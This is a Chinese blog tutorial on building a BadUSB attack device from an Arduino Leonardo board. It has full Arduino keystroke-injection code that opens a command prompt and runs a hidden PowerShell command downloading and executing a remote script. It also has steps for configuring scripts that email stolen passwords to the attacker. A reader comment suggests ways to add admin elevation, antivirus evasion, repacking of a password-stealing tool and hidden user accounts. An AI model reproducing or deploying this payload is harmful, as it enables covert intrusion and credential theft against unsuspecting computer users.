登陆 注册

Badusb黑客硬件烧写

Lzers 2019-10-28 Badusb极客有趣

在文章开始之前我们先看看BadUSB内部构造

badusbneibu


在接下来看看BadUSB HID的攻击原理以及优势

HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。简而言之,本文要介绍的Badusb利用的是虚拟键盘来实现恶意代码的执行。

而优势在于攻击者将恶意代码存放于Badusb的固件中,PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件无法应对BadUSB的攻击。

BadUSB攻击流程

Bad-Usb插入后,会模拟键盘对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载恶意代码(通常为powershell脚本)并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。

badusbgongji


本文中我们使用

软件:Arduino

硬件:BS Micro pro micro leonardo Arduino 开发板

硬件如图

O1CN01KxBvkF1piUsrw9wPu_!!882725394


需安装Teensyduino驱动

2019080713421886


需要注意的是安装路径得同ardunio的安装路径

在正式开始烧写之前,我们需要下载BadUSB代码文件

2019080808291460


就这玩意儿

修改main.ps1文件,如下图

2019080808293522


将勾选部分xxx.xxx修改为自己域名

2019080808294944


修改勾选部分

发信服务器如smtp.qq.com/smtp.163.com

邮箱账号/密码(授权码)

邮件标题如”BadUSB新鱼儿来啦“

邮件内容如“BadUSB获取结果”

2019080808300233


修改GetPass.ps1文件前两行勾选部分为自己域名

2019080808301410


同时修改第6行开始的发信配置,如main.ps1文件一样修改即可。此处不过多赘述

将修改后的全部文件用HFS上传到服务器(注意服务器需要外网访问,hfs网络文件服务器百度下载即可)

将硬件插入Usb接口并输入Windows +R 输入命令devmgmt.msc打开设备管理器
查看串口信息

2019082414324154


打开Arduino IDE并根据以下路径  工具->版->选择“Arduino Leonardo”

2019082414330181


port选择串口信息相符的

void setup(){
Keyboard.begin();
delay(5000);
Keyboard.press(KEY_LEFT_GUI);
delay(500);
Keyboard.press(‘r’);
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release(‘r’);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println(“CMD”);
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(3000);
Keyboard.println(“powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString(‘http://xx.xxx.xx/main.ps1’) “);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();
}
void loop() {}

将改代码烧写入硬件

xx.xxx.xx修改为自己的地址

然后就没了…

附件下载

大小 : 19.8 MB |  下载量 : 43 次 |  文件类型 : 压缩文件  

已有1条评论
  • 2019-12-24 18:43:34

    (1)如何进入CMD后,keyboard通过CTRL+SHIFT+ENTER进入管理员模式的DOS界面
    (2)没有绕过360或者腾讯电脑管家主动防御
    (3)lazagened没有重新打包,MD5已被杀软云端记录
    (3)没有最大化的隐藏操作界面,黑乎乎的一片界面期间如果第一反应按键盘所有的命令可能会失效无法识别
    (4)没有控制文件存放位置,现在国内部分主机如果固态硬盘只会有一个C盘,没有控制文件存放位置,有几率可能给邮箱发送空文件
    (5)没有新建隐藏用户,获取的密码以及未在管理员模式下进行,密码获取不全面
    这些如果您都改了,那简直很beautiful

请关注微信公众号
微信二维码
不容错过
Powered By HeiBaiTeam.